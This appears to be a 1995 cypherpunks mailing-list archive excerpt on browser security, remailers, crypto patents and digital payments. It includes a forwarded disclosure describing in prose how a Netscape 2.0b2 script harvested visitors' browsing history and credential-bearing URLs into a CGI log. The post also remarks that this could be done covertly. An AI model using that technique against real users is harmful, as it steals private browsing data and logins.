>I've recently got hold of the latest netscape, and was (at first) very >excited about the new "LiveScripts" that it supports. If people don't >yet know - these "LiveScripts" allow you to put small programs into your >web page that is then executed by the Netscape client. There is no >DIRECT way for these programs to send information back to the owner of >the web page, however I was able to do it in a not-so-direct way. > >The "LiveScript" that I wrote extracts ALL the history of the current >netscape window. By history I mean ALL the pages that you have visited >to get to my page, it then generates a string of these and forces the >Netscape client to load a URL that is a CGI script with the QUERY_STRING >set to the users History. The CGI script then adds this information >to a log file. Now if this hasn't quite CLICKED yet lets do a little >example. > >Johnny Mnemonic starts up his newly acquired version of Netscape2.0b2 >to start his daily "surf" session. First he decides to check his CD-NOW >purchase and uses the handy Auto-Login URL. Then he decides to go to >Lycos and do a search. In his search he find my page, which he decides >to visit. Suddenly he is transported, not to my main page but to one >of my CGI scripts, which in turn happens to have ALL the URL's he just >been to in it. This means that in my log will be: > > - the URL to use to get into CD-NOW as Johnny Mnemonic, including > username and password. > - The exact search params he used on Lycos (i.e. exactly what he > searched for) > - plus any other places he happened to visit. > >I do this in a way that the user will KNOW that it has happened and >will _hopefully_ email Netscape and tell them they are NOT impressed. >But it would be EASY for me to change the CGI script so that the user >is unaware that it has actually happened, unless they closely examine >their URL history (in fact they'll probably just think its a netscape >bug). > > >If you're skeptical about this then do the test yourself. Get netscape >2.0b2 and do some normal surfing, and then go to Lycos. Do a search for: > > scotts car boot sale > >which should return the URL - http://www.tripleg.com.au/staff/scott > >Click on the URL and sit back an watch. First my main page will show up >but a little while later you should be transported to a CGI bin script >that will show you your URL history. > >I have tested this with both the Linux 2.0b2, and Solaris 2.0b2 versions >and both have done the same thing. I would be interested in knowing if >it happens for ALL versions of Netscape2.0b2. The log file does log >the User Agent (i.e. the name of the platform you are using) so by simply >going to the page I will know that your version of Netscape is also >open to this form of attack. > >Currently I can find no way to configure Netscape2.0b2 to NOT run >LiveScripts - and at the very least this option should be quickly >added to the next version of netscape to be released. But a far >better solution (IMHO) would be for netscape to pop up a window before >running the LiveScript and let you know what the LiveScript wants access >to, e.g. if it only wants to print out the current time then that's >OK, but if it wants to read my history list and then transport me to >a CGI script and add me to a logfile then maybe I would say NO. > >I think I've said enough.... > >If you've got any further questions, or want some more information just >email me : scott at tripleg.com.au > >- -- >Scott. > >Quote from a car accident insurance claim: "I told the police that I was >not injured, but on removing my hat, I found that I had a skull fracture." >- ------- End of forwarded message ------- > > >------------------------------ ------------------------------------------------------------ Thaddeus "Doc" Ozone "Specialization is for insects." -RAH "I yam what I yam and that's all what I yam!" -Popeye From jcobb at ahcbsd1.ovnet.com Tue Dec 5 00:05:02 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Tue, 5 Dec 95 00:05:02 PST Subject: No Privacy Right on "My" Desktop ? Message-ID: Friend, A 12 04 95 The Electronic Telegraph newsstory headlined 'Spoilsport' software bars games reports that An American company called DVD has developed a utility called UnGame that can delete up to 3,100 games from a computer network. Even if the game is hidden on the com- puter user's own hard disk, it will find it. The user's own hard disk? Although the machines at work usually belong to the com- pany, most employees regard them as an electronic equi- valent of their desk, and are similarly territorial. John Davison, PC Zone editor, says: If anyone stole something from your desk you'd be fed up. If anybody stole something from my computer, I'd be equal- ly disgusted. What kind of software is UnGame? The newsstory suggests the answer: ...industry experts have complained that companies may be releasing "tailored viruses".... I believe my first post to the list was about McAfee's Virus Blocker. Perhaps that can be...adapted. If so, those who then declared the information had nothing to do with privacy may continue playing their games. Of course companies may try another tack: Oracle's "internet terminal." As dlv at bwalk.dm.com pointed out in his 11 18 95 post, [I guess, they mean no permanent storage or software other than the browser in ROM. No remembered state, no viruses ... -DV] In "my" terminal. Cordially, Jim NOTE. The Electronic Telegraph's website URL is: http://www.telegraph.co.uk The newsstory's online filename is: ngame02.htm It was written by: ROBERT UHLIG, TECHNOLOGY CORRESPON- DENT It first appeared in 12 03 95 The Daily Telegraph. The McAfee website URL is: http;//www.mcafee.com From jsw at netscape.com Tue Dec 5 00:16:13 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Tue, 5 Dec 95 00:16:13 PST Subject: Tricky Netscape Security Hole In-Reply-To: <199512050729.AAA28538@mailhost1.primenet.com> Message-ID: <30C3FEE5.71C6@netscape.com> Thaddeus Ozone, by way of carolann at censored.org Censored Girls Anonymous wrote: > > Yes it's full of headers, but it's the complete, unexpurgated version. > If this theory is correct, this IS FAR WORSE THAN A 40 bit key. > > I saw the livescript on the source code. > I use 1.22 for image stability right now, though. > > Yes it's a came from, a came from, a came from kinda deal, > but in the interest of security brevity it "seems real enough" to me. Didn't you see this discussed here last week? This is a bug in Beta 2. It has since been fixed, and the now available Beta 3 of Netscape 2.0 has the fix. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From lyalc at ozemail.com.au Tue Dec 5 02:52:00 1995 From: lyalc at ozemail.com.au (Lyal Collins) Date: Tue, 5 Dec 95 02:52:00 PST Subject: bulk RC4 brute forcing In-Reply-To: <199512030356.OAA17497@oznet02.ozemail.com.au> Message-ID: <30C51EF5.5FBB@ozemail.com.au> following requests for this test code, the attached should compile and run the tests I desciribed earlier. It is messy - sorry. lyal -- All mistakes in this message belong to me - you should not use them! -------------- next part -------------- A non-text attachment was scrubbed... Name: bin00000.bin Type: application/octet-stream Size: 7754 bytes Desc: "RC4M.C" URL: From jirib at cs.monash.edu.au Tue Dec 5 03:40:16 1995 From: jirib at cs.monash.edu.au (Jiri Baum) Date: Tue, 5 Dec 95 03:40:16 PST Subject: Getting a copy of the Jim Clark speech In-Reply-To: <199512010549.VAA27874@blob.best.net> Message-ID: <199512051140.WAA09692@fangorn.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello Frank Stuart , loki at obscura.com, and cypherpunks at toad.com and "James A. Donald" J.A.D. wrote: > At 09:43 PM 11/30/95 -0600, Frank Stuart wrote: > > I'm working on an "obnoxify" program to convert > > normal html documents into documents that look ... > Is there any way one could set up a dirty pictures web > page in such a fashion that it would be difficult, painful, > and impractical to get at the pictures through that page > with a netscape browser? Well, if you can run CGI scripts, it's very easy: you simply check the USER_AGENT field, and then send different versions. For an example, see http://www.cs.monash.edu.au/cgi-bin/cgiwrap/~jirib/no-Mozz You can make the script more or less drastic according to taste. Can't *anyone* write a simple shell script any more? Jiri - -- PGP 463A14D5 -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMMQvrCxV6mvvBgf5AQG1SQQA61zpMO33EuyBm9Siapk/Rg3w0KJ50BLK 52zAAn1aYo1YkfTK0uWaRyooaZRYRji7HJR5O9Fs2ss2A6JKaMZ3QFCAKdOI3M6C aYvPtL+0/45WW++ilAjKSoCKOZhzxP79+9xxLt0dyOf0J6y3DO6gKg9GlH1ZKEpl 6/V79f4ZmeQ= =4RLq -----END PGP SIGNATURE----- From frissell at panix.com Tue Dec 5 03:40:26 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 5 Dec 95 03:40:26 PST Subject: The "Future" Fallacy Message-ID: <2.2b8.32.19951205114442.0085d9d4@panix.com> Bill Gates (like Mister Newt before him) committed what I call the Future Fallacy in "The Road Ahead." Page 106. "Soon any child old enough to use a computer will be able to transmit coded messages that no government on earth will find easy to decipher." DCF "Term limits aren't enough. We need jail." -- PJ From gnu at toad.com Tue Dec 5 03:44:38 1995 From: gnu at toad.com (John Gilmore) Date: Tue, 5 Dec 95 03:44:38 PST Subject: SF NSA FOIA appeal hearing canceled on the 6th. Go to San Jose! In-Reply-To: <9511231746.AA16675@toad.com> Message-ID: <9512051144.AA27252@toad.com> > At 9AM on December 6 in San Francisco, the 9th District Court of Appeals > will finally hear the appeal of my original FOIA case against NSA. Wrong! The three Court of Appeals judges who were selected to review my case have decided that there is no need for "oral argument" (a hearing). They will simply decide based on the written briefs that they got a year ago when we did the appeal. This probably means we'll get a decision sooner rather than later, but we don't know how it will come out. Sorry for the false alarm. I just found out last week. So, you can feel free to go to Roger Schlafly's crypto patent validity case in San Jose instead. I'll repeat the info he provided, below. John Gilmore > On Wed., Dec. 6, 1995, 10:00 am, San Jose Federal Bldg, there will > be a hearing on the validity of the Diffie-Hellman, Hellman-Merkle, > RSA, and Schnorr patents. > > There are also some annoying procedural technicalities that are > also scheduled to be heard, so we may not get to the patents > right away. (antitrust standing, sufficiency of pleadings, > admissibility of evidence, etc.) > > Details: > Schlafly v. Public Key Partners & RSA Data Security > Case C-94-20512 SW PVT > Hon. Spencer Williams > At the San Jose federal building, 280 S First St. > Ask the US Marshals where Williams' courtroom is while you go thru > the airport-style security. > Court Clerk: 408/535-5364 > > The Federal Bldg is in downtown San Jose, between 101, 880, and 280. > I will take 280 to SJ, go north on 87, right on the first exit, and > park in the first convenient lot or garage. There is some street > parking, but the SJ meter maids are very efficient. If you come > from the north, you may want to take 87 or the Almaden Expwy. (I get > those mixed up.) > > The judge is used to lawyers wearing suits, so try to wear something > that won't appear disrespectful. > > Roger Schlafly > > phone: 408-476-3550 > CompuServe: 76646,323 > US Mail: PO Box 1680, Soquel, CA 95073 USA > Internet: rschlafly at attmail.com From a.brown at nexor.co.uk Tue Dec 5 04:18:22 1995 From: a.brown at nexor.co.uk (Andy Brown) Date: Tue, 5 Dec 95 04:18:22 PST Subject: Some info on file/memory erasing on NT Message-ID: <30C437D4.3EC0@nexor.co.uk> The subject of protecting memory and files from other users in a multi-user environment always seems to come up here every few weeks, so the following short article culled from the MS Win32 SDK might be of interest. - Andy [...] SUMMARY File systems under Windows NT currently have virtual secure erasure (when a file is deleted, the data is no longer accessible through the operating system). Although the bits could still be on disk, Windows NT will not allow access to them. MORE INFORMATION The NTFS file system does this by keeping a high-water mark, for each file, of bytes written to the file. Everything below the line is real data, anything above the line is (on disk) random garbage that used to be free space, but any attempt to read past this high-water mark returns all zeros. Other reusable objects are also protected. For example, all the memory pages in a process's address space are zeroed when they are touched (unlike the file system, a process may directly access its pages, and thus the pages must be actually zeroed rather than virtually zeroed). Note that file system security assumes physical security; in other words, if a person has physical access to a machine and can boot an alternative operating system and/or add custom device drivers and programs, he/she can always get direct access to the bits on disk. [...] From BRUEN at mitlns.mit.edu Tue Dec 5 04:29:01 1995 From: BRUEN at mitlns.mit.edu (Bob Bruen, MIT Lab for Nuclear Science) Date: Tue, 5 Dec 95 04:29:01 PST Subject: another fbi prosecution Message-ID: <951205073038.60202194@mitlns.mit.edu> The Chronicle of Higher Education (Dec 8, 1995) page A21 reports that Monmouth University (West Long Branch, New Jersey; http://www.monmouth.edu) sophomore Dominick LaScala was charged last week in federal court with two counts of computer fraud. Dominick had his campus account taken away after other users complained that he had been "advertising business proposals inappropriately on line." The FBI alleges that he then sent 24,000 email messages in one day from a commercial account (unamed) to Monmouth's system.. This denial of service attack was successful for about 5 hours. He is facing six(6) years in prison and a up to $350,000 in fines (1.20 years/hr and and $70,000/hr). His lawyer (Kenneth Weiner) claims that "even if his client sent the mail bomb" since no damage was done to the system, he could not be convicted under the computer fraud statute. He also claims that prosecutors are trying to make an example of his client. The university is still trying to figure out whether he can be punished under the university code of conduct. From dave.turner at wmc.ac.uk Tue Dec 5 04:58:42 1995 From: dave.turner at wmc.ac.uk (Dave Turner) Date: Tue, 5 Dec 95 04:58:42 PST Subject: Joining The Mailing List Message-ID: <"mailhub.live:260730:951205123724"@liverpool.ac.uk> Cypherpunks, Would it be possible to include me on your current mailin list. Thanks Dave. From JR at ROCK.CNB.UAM.ES Tue Dec 5 06:04:19 1995 From: JR at ROCK.CNB.UAM.ES (JR at ROCK.CNB.UAM.ES) Date: Tue, 5 Dec 95 06:04:19 PST Subject: Netscape gives in to key escrow Message-ID: <951205161624.20a04076@ROCK.CNB.UAM.ES> SMTP%"unicorn at schloss.li" 4-DEC-1995 23:35:15.06 writes >On Mon, 4 Dec 1995 JR at ns.cnb.uam.es wrote: > >> Black Unicorn wrote >> >On Fri, 1 Dec 1995 JR at ns.cnb.uam.es wrote: ... many cuts all along to save bandwidth ... > >I'm afraid you have missed the point too. > >I don't care as much what the personal positions are, or what the ethical >center from which person x or person y works. > >I am most distressed because of what I see as a snowjob. > >"We are anti-GAK" > >Great, tell me what you have done to prevent GAK from proliferating. > >In the absence of an answer to that challenge, I have to question the >first statement as fluff or PR. > >This has nothing to do with Netscape sharing my opinion, or not sharing >my view on the evil of GAK. It has to do with putting up or shutting >up. I have been told that Netscape agrees with me, or will agree with >me, I just don't know that I believe it yet. For the last time: I have nothing to do with Netscape. So, please, stop making silly associations. What I do to defend my opinions it to try and get more people involved in the subject, explain the problems in terms they can understand, discuss with them about possible solutions (sometimes they have better ideas than me) and try to promote an effective course of action. And in any case that's *my* business. Being in a different country and even continent, what I do may not be of any direct consequence to you. And since I have nothing to do with any commercial company -hey I don't even use Netscape- it has no relationship whatsoever with Netscape or any other company. If you think that people likes to hear complains, go along. In my experience people is more cooperative when they see better solutions than just making a boicott and renouncing to use things they like. So, I'll keep on explaining what crypto can do for them and how easy it is to be taken advantage of. And how easy it is for them to press and get what they deserve. WRT legal courses of actions, just remember there's a whole world our your privy. It's sad you don't know better, but if you look around carefully you'll discover that many of the proposed actions are not feasible in many places. Just go out of your shell. I haven't either. I wouldn't be here if I did. jr From bstrawse at copper.ucs.indiana.edu Tue Dec 5 06:06:15 1995 From: bstrawse at copper.ucs.indiana.edu (Bryan Strawser) Date: Tue, 5 Dec 95 06:06:15 PST Subject: [Mix-L] WARNING: sting via remailer! (fwd) Message-ID: <199512051407.JAA18236@copper.ucs.indiana.edu> Forwarded message: > From owner-mix-l at alpha.jpunix.com Tue Dec 5 09:03:10 1995 > Date: Tue, 5 Dec 1995 07:55:21 -0600 (CST) > Message-Id: <199512051355.HAA12202 at alpha.jpunix.com> > To: mix-l at vishnu.alias.net, remailer-operators at c2.org, > mail2news at utopia.hacktic.nl > Newsgroups: alt.privacy, alt.privacy.anon-server, alt.security > From: "Mr. Boffo" > X-Comment1: This message did not originate from the > X-Comment2: above address. It was automatically remailed > X-Comment3: by an anonymous mail service. Please report > X-Comment4: problems or inappropriate use to > X-Comment5: > Subject: [Mix-L] WARNING: sting via remailer! > Sender: owner-mix-l at jpunix.com > Precedence: bulk > > I was in the federal building coffee shop in Reston, Va. yesterday > when I overheard a conversation between what appeared to be two FBI agents > discussing a sting operation involving Mixmaster. Hearing the word > "mixmaster" naturally caused my ears to perk up and I listened further. > > It appears that the FBI has coerced a mixmaster remailer operator > into cooperating with them in a sting operation to catch remailers when > they forward email pertaining to pornography, pedophilia, and copy-written > software. > > My questions are a) is it possible to perform this type of > monitoring on a mixmaster remailer and, b) what is the identity of the > cooperating remailer operator? > > This concerns me greatly as I use remailers to privatize my > important email regularly and I don't want my identity or my email > compromised because of a "spook in cypherpunks clothing". > -- Bryan Strawser, Indiana University, Bloomington, USA Remember Waco bstrawse at indiana.edu http://copper.ucs.indiana.edu/~bstrawse From nsb at nsb.fv.com Tue Dec 5 06:08:56 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Tue, 5 Dec 95 06:08:56 PST Subject: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment) In-Reply-To: Message-ID: Excerpts from mail.nonpersonal: 4-Dec-95 Re: Meeting notes from ANSI.. Robert Hettinga at shipwrig (4665*) > MTB's > cost on a Digicash trade is $.50, while the most efficient book-entry > system on the net, First Virtual, has to charge, what? $5.00 to break even? There are some interesting unspoken assumptions here. To calculate anyone's "cost" on a transaction requires the complex amortization of costs over many transactions, with assumptions/projections about the transaction volume. I have no idea where you came by either of your numbers, MTB's or FV's, but I can tell you that your guess about FV is off the mark. And I'm sure that MTB is no more eager than we are to publicly dissect all the underlying cost structures, so I have no idea what the 50 cents that you cite really means. >From a consumer standpoint, I think that the only reasonable thing you can do is to assume that the vendors are pricing their services at a level that they believe yields profit in the long term. FV charges 29 cents plus 2 percent, which means that you can put 50 cent charges through the system if you're willing to give up 30 of those cents. By pricing it that way, we have invited people to put 50 cent charges through the system. We wouldn't have done that if we didn't think we could make money on it. To be perfectly clear: our minimum service charge is 30 cents, not 5 dollars. If we didn't think it was worthwhile to take transactions that small, we wouldn't do so. Finally, on the more philosophical matter: > They don't get it. The network isn't a hierarchy. The network is a > geodesic. You don't need offsetting book entries, you can trade digital > certificates much cheaper. You don't need to control your software, you > need to make it autonomous and set it free. In terms of crypto-privacy, anonymous communication, and things like that, I agree completely. However, it's genuinely more complicated than that where money is concerned, because there are aspects of the translation between "bits and bucks" that have some extremely serious practical complexities. A true geodesic structure is self-supporting and self-structuring. A cryptographic infrastructure can and should be similar, I agree completely. However, a *monetary* infrastructure needs convertability, and the points of conversion are always the best targets of attack for criminals. (I've been casting about for an analogy to physical geodesics, and it's hard to find one. The best I can come up with is to imagine that in order to convert a carbon buckyball to a more conventional set of carbon molecules, you had to do it through a service bureau that was capable of error, fraud, or subversion by outside criminals. This would ONLY matter if you ever wanted to do such conversions, but it would matter a lot then, especially if you had to suffer a serious financial loss if you got the wrong carbon molecules at the end of the process.) IF you wanted to settle for a totally non-convertible economy (like rubles in the old Soviet Union, or like the LETS system on the net today, as I understand it) then you could build it geodesically. But if you want to be able to convert back and forth between Internet payment systems and non-Internet payment systems, it can never be truly geodesic. It will always be attackable at the points of conversion. (You may "trade digital certificates", but how do you know the ones you're receiving were obtained for legitimate real-world value?) Because of this, the underwriting financial institutions, who have a very reasonable desire to limit their own risk, will inevitably seek the protection-by-traceability offered by something less than perfect anonymity. We may not like it, but it's a very natural position to be taken by those who are actually bearing the financial risks at the point of conversion. The truth is that there's a natural tension between the consumer's desire for privacy and the underwriter's desire for financial protection. First Virtual has been worrying about this for 2 years now, actually. Our solution -- which I think has held up pretty well -- was to allow users to be pseudonymous (as opposed to anonymous), to limit the traceability-by-pseudonym to the service bureau (FV) that effects the payments, and to treat all such information with the highest possible standards of confidentiality. The fact that the information can be traced when absolutely necessary is actually a huge selling point with those who carry the financial risks. I'm not claiming it's a perfect solution, but I think that unless you are clear about the underlying tradeoffs, it's hard to talk seriously about how to build a better solution. -- Nathaniel -------- Nathaniel Borenstein | (Tense Hot Alien In Barn) Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON: FAQ & PGP key: nsb+faq at nsb.fv.com | http://www.netresponse.com/zldf From nelson at crynwr.com Tue Dec 5 06:30:56 1995 From: nelson at crynwr.com (Russell Nelson) Date: Tue, 5 Dec 95 06:30:56 PST Subject: WARNING: sting via remailer! In-Reply-To: <199512051355.HAA12202@alpha.jpunix.com> Message-ID: [ I see that the original has been forwarded to cypherpunks, so I'll also send my response there. -russ ] Boffo writes: > I was in the federal building coffee shop in Reston, Va. yesterday > when I overheard a conversation between what appeared to be two FBI agents > discussing a sting operation involving Mixmaster. Hearing the word > "mixmaster" naturally caused my ears to perk up and I listened further. > > It appears that the FBI has coerced a mixmaster remailer operator > into cooperating with them in a sting operation to catch remailers when > they forward email pertaining to pornography, pedophilia, and copy-written > software. Uh-oh! I'd better shut down my remailer, but fast, based on an unsubstantiated rumor. Especially one that makes little sense. Why do you need a sting? All you have to do is use a single remailer, and send the mail from yourself, to yourself. You know the source, destination, and who handled it. IF a court can be convinced that forwarding email containing illegal materials is the same as asking to receive email containing illegal materials, then ALL of our butts are toast. > My questions are a) is it possible to perform this type of > monitoring on a mixmaster remailer and, b) what is the identity of the > cooperating remailer operator? > > This concerns me greatly as I use remailers to privatize my > important email regularly and I don't want my identity or my email > compromised because of a "spook in cypherpunks clothing". You fool. If you use remailers regularly, then YOU ARE KNOWN TO THE SPOOKS. Face facts. We know that the FBI spends a minimum of $10,000,000 each year (count the wiretaps, multiply by agents and do the math) just for telephone wiretaps. Computer wiretaps are a LOT CHEAPER. -russ http://www.crynwr.com/~nelson Crynwr Software | Crynwr Software sells packet driver support | PGP ok 11 Grant St. | +1 315 268 1925 voice | Flushing, NY. Not just a suburb, Potsdam, NY 13676 | +1 315 268 9201 FAX | it's a good idea in general. From mix at remail.gondolin.org Tue Dec 5 06:34:00 1995 From: mix at remail.gondolin.org (Gondolin Mixmaster Remailer) Date: Tue, 5 Dec 95 06:34:00 PST Subject: gondolin.org remailer announcement Message-ID: <199512051421.JAA02528@anduin.gondolin.org> Gondolin Technologies is proud to announce our resumption of remailer services to the online community. Some of you may remember the remailer services based at that was on-line for most of this year. We are now back and better than ever with highly improved hardware and net connections. We are hosting a Type I "Cypherpunks" remailer, as well as a Type II "Mixmaster" remailer at . The PGP public key for the type I remailer is below: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzC7/HwAAAEEAKFLOSwJ6FdRb/Z0Yj+RV3inx9aRtrJI+5kXpZTWtcQNo50K qKzRB9joL68jxeQTa4FTOFsWlbsn7dCcOpkOCJqoo4Uby+bIDRP8E5MYGgALVoNh xO6Hucj2Hh1v+koOTvtv4lDWaDdhxN7rPPb8KlTC2FPFIK9/2n7xTkxYcqfxAAUR tDJHb25kb2xpbiBUeXBlIEkgUmVtYWlsZXIgPG1peEByZW1haWwuZ29uZG9saW4u b3JnPokAlQMFEDC+kr2Oh92U+GrHWQEB3s8EAI6+3t59tYB+EWUQDWvSaPNqihab 8lRkctA0gPtOWD3f6nOBcPjIrAoeZ3mB5ASJwPkXGbe6rTGrBo6HuC2t45bscviV O46wKKX6aIJnsCM6vx/vm1aWdm/a5DsBv1BYnnNEedrwFlvzzAhBFtolK1a7i6+N PDnfGlrs9q6U+9LBiQCVAwUQMLv8rPvQGgQ7UJMZAQECYgP9E2riZwFPvNFpKuX9 9JbG4PJGzOm7TAQO1/hIb9BAk7KrLs7yQuTzfQs6hAXB88o1ofIPYp5uz/GvAleg wCGIA3ZnhYh5yiS4UArZbCfr8hDvXsUqQBxR5tfLHj5qOkOejFckIHCRC/8wb23g 3Xu7Zh00PpJAD1EZVfDdhseMXGE= =AJYL -----END PGP PUBLIC KEY BLOCK----- The Type II remailer supports posting via mail2news gateways. We are using Mixmaster 2.0.3 from Lance Cottrell. The Type I remailer supports PGP encryption, latent time, hash marks, cutmarks, and so on. Our type I software is John Fleming's Freedom Remailer v1.6beta. Our remailers also utilize a reordering pool. Address any comments, complaints, or concerns to . - Bryan Strawser, System/Network Administrator, Gondolin Technologies From nelson at crynwr.com Tue Dec 5 06:56:41 1995 From: nelson at crynwr.com (Russell Nelson) Date: Tue, 5 Dec 95 06:56:41 PST Subject: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment) In-Reply-To: Message-ID: Nathaniel Borenstein writes: > A true geodesic structure is self-supporting and self-structuring. A > cryptographic infrastructure can and should be similar, I agree > completely. However, a *monetary* infrastructure needs convertability, > and the points of conversion are always the best targets of attack for > criminals. Ah! You mean the criminals seeking to exploit the conversion, not criminals using the anonymity of the system for income secrecy. I got a little confused right there. -russ http://www.crynwr.com/~nelson Crynwr Software | Crynwr Software sells packet driver support | PGP ok 11 Grant St. | +1 315 268 1925 voice | Flushing, NY. Not just a suburb, Potsdam, NY 13676 | +1 315 268 9201 FAX | it's a good idea in general. From adam at homeport.org Tue Dec 5 07:20:38 1995 From: adam at homeport.org (Adam Shostack) Date: Tue, 5 Dec 95 07:20:38 PST Subject: Joining The Mailing List In-Reply-To: <"mailhub.live:260730:951205123724"@liverpool.ac.uk> Message-ID: <199512051525.KAA27932@homeport.org> Dave Turner wrote: | Cypherpunks, | Would it be possible to include me on your current mailin list. Would journalists *please* stop writing about cypherpunks at toad.com, and start including the majordomo at toad.com address? Thanks. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From wwwziff at internet.com Tue Dec 5 07:32:27 1995 From: wwwziff at internet.com (ZD Net / World Wide Web Edition) Date: Tue, 5 Dec 95 07:32:27 PST Subject: ZD Net Update v.1 #2 Message-ID: <199512051533.KAA11909@yipee.internet.com> __________________________________ZD Net Update_______________________________ v. 1 #3 11-27-95 Welcome to ZD Net Update, the free E-mail newsletter created especially for registered users of Ziff-Davis Interactive's ZD Net/World Wide Web edition. ZD Net Update is a bi-weekly bulletin that alerts you to new and exciting developments on ZD Net. In this issue: > COMPUTER LIFE ONLINE PRESENTS THE HOT SITE OF THE DAY > INTRODUCING Q&A WITH PC MAGAZINE'S MICHAEL MILLER > ZD INTERNET LIFE INVITES YOU TO BECOME A WEB REVIEWER > MACUSER ANNOUNCES 11TH ANNUAL EDITORS' CHOICE FINALISTS * * * * * * * * * * COMPUTER LIFE ONLINE PRESENTS THE HOT SITE OF THE DAY The editors at Computer Life Online surf the Net like a bad habit. When they find sites that are hot, fresh, interesting--or just relevant to a healthy computer life--they share the news with everyone here on the Web. Then, before the Site of the Day gets warm, they put it on the "Previously Featured Hot Sites" page and serve up another one. Check these out, and you may be on your way to developing a few bad Net habits of your own: http://www.zdnet.com/~complife/filters/site.html * * * * * * * * * * INTRODUCING Q&A WITH PC MAGAZINE'S MICHAEL MILLER PC Magazine Online (http://www.zdnet.com/~pcmag/) is now giving their readers the opportunity to ask PC Magazine's editor-in-chief, Michael Miller, frank questions regarding the ever-changing state of the computer industry. Every week, this new column will feature questions from readers about a given topic. You can send questions as well as suggestions for topics you'd like to see Miller address in future columns. As Miller puts it: "My print column is really an essay on a particular topic. I try to focus on a broad variety of things, although most my print columns have been Internet-related lately. That's not too much of a surprise, as I've been spending a lot of time working with new tools and content for the Internet. This column will be more conversational. It will give me an opportunity to answer reader questions and address their concerns. In addition, this Q&A will be more timely than my magazine column because it doesn't have to be printed, bound, and mailed." Among Miller's first topics: PC Magazine's 1995 Technical Excellence Awards and reflections on the recent Comdex show. * * * * * * * * * * ZD INTERNET LIFE INVITES YOU TO BECOME A WEB REVIEWER ZD Internet Life (http:/www.zdnet.com/zdil/), the first interactive magazine designed from the ground up around a Web site, wants you to become part of their Web review team. Now you can tell the world what you really think of a Web site. Check out the new "Rate-o-Matic" review tool http://www.zdnet.com/zdil/cgi-bin/review.cgi and see for yourself. Every review enters you in a monthly drawing, and the most astute comments may be included in ZDIL's database. Need some help finding the sites you'd like to review? ZDIL's great new Search capability will give you a lift: http://www.zdnet.com/zdil/cgi-bin/index.pl * * * * * * * * * * MACUSER ANNOUNCES 11TH ANNUAL EDITORS' CHOICE FINALISTS What were the hottest Mac products this year? Find out by perusing MacUser, which has announced the finalists for this year's Editors' Choice Awards: http://www.zdnet.com/~macuser/eddy95/ But that's just the beginning of the story. You are also invited to join the staff on Monday, December 4, when MacUser's Eddy Web Site celebrates its grand opening.This state-of-the-art Web site will feature downloadable product demos, downloadable QuickTime video, RealAudio commentary from editors, links to product reviews published in MacUser, and the 1995 Eddy Awards Sweepstakes. Winners will be announced on Sunday, December 17 in a live ceremony on America Online (Keyword: Eddy95). Information about all the winners will appear on the Eddy Web Site the following day. * * * * * * * * * * ZD Net Update is the official newsletter of ZD Net/World Wide Web Edition. It is compiled by Tom Schmidt (tom_schmidt at zd.com). Feel free to respond with any news, notes, comments, or suggestions. To unsubscribe to ZD Net Update, point your browser to: http://www.zdnet.com/cgi-bin/ziffmail.pl/update and select "Unsubscribe to ZD Net Update." From dreschs at mpd.tandem.com Tue Dec 5 08:03:12 1995 From: dreschs at mpd.tandem.com (Sten Drescher) Date: Tue, 5 Dec 95 08:03:12 PST Subject: Globally legal Netscape In-Reply-To: <9512032146.AA07279@all.net> Message-ID: <199512051606.KAA05672@galil.austnsc.tandem.com> rthomas at pamd.cig.mot.com (Robert Owen Thomas) said: ROT> look, this is just a *bit* extreme. having been one of those folks ROT> sworn to uphold the Constitution, i can tell all of you that there ROT> is no master plan to rid the American people of their rights and ROT> freedom. Oh, I'm glad that a senior advisor to the President of the United States is reading this list. ROT> regards, --robert, a former U.S. government employee...but i won't ROT> say where...;-) -- Oh, so you _aren't_ a senior advisor? I didn't think I had ever heard your name mentioned in any press reports. -- #include /* Sten Drescher */ To get my PGP public key, send me email with your public key and Subject: PGP key exchange Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3 From jcobb at ahcbsd1.ovnet.com Tue Dec 5 08:47:12 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Tue, 5 Dec 95 08:47:12 PST Subject: Info on Netscape's key escrow position Message-ID: Blanc, On 12 02 95 you pointed to: ...an underlying problem, which is of not having a sense of freedom to stand up to the Dark Side. You have put your finger on perhaps THE problem: Why did we cast aside our sense of freedom? How may we re-ignite the spirit of freedom? I believe excerpts from a newsstory in today's Electronic Telegraph provide a hint regarding the first question: JOHN Major and Lord Taylor, the Lord Chief Justice, are to have informal talks at No 10 Downing Street in an attempt to avert a deepening rift between Government and judiciary. The meeting has been arranged following concern over the number of adverse court judgments against ministerial de- cisions and mounting opposition by judges to plans by Mi- chael Howard, the Home Secretary, to impose tougher man- datory sentences on habitual criminals. It was being emphasised in Whitehall last night that the in- formal meeting was intended to explore ways of improving relations. It was in no sense an attempt to put pressure on the judges. It emerged last night that Mr Major and Lord Taylor are like- ly to discuss ways of increasing the pay of the judiciary. Senior judges are said to be aggrieved that their salaries have fallen behind. In no sense is one part of the the State putting pressure on another part of the State... Through every sense, the populace is trained to appreciate the justice of not having a sense of freedom to stand up Except at the pay window. Cordially, Jim NOTE The URL of The Electronic Telegraph's website is: http://www.telegraph.co.uk The newsstory's headlined: "Pay and peace talks for judges." Its online filename is: 1judge05.html. It's dated 12 05 95. The story was written by: GEORGE JONES and TERENCE SHAW. From solman at MIT.EDU Tue Dec 5 08:51:33 1995 From: solman at MIT.EDU (solman at MIT.EDU) Date: Tue, 5 Dec 95 08:51:33 PST Subject: Secure versus ? Message-ID: <9512051652.AA17214@ua.MIT.EDU> Thanks to everybody who replied to my previous message. As most of you suspected, it turned out to be possible to break the permutations I was using. The reason why I have pursued this despite its non-intuitiveness is that the following well known 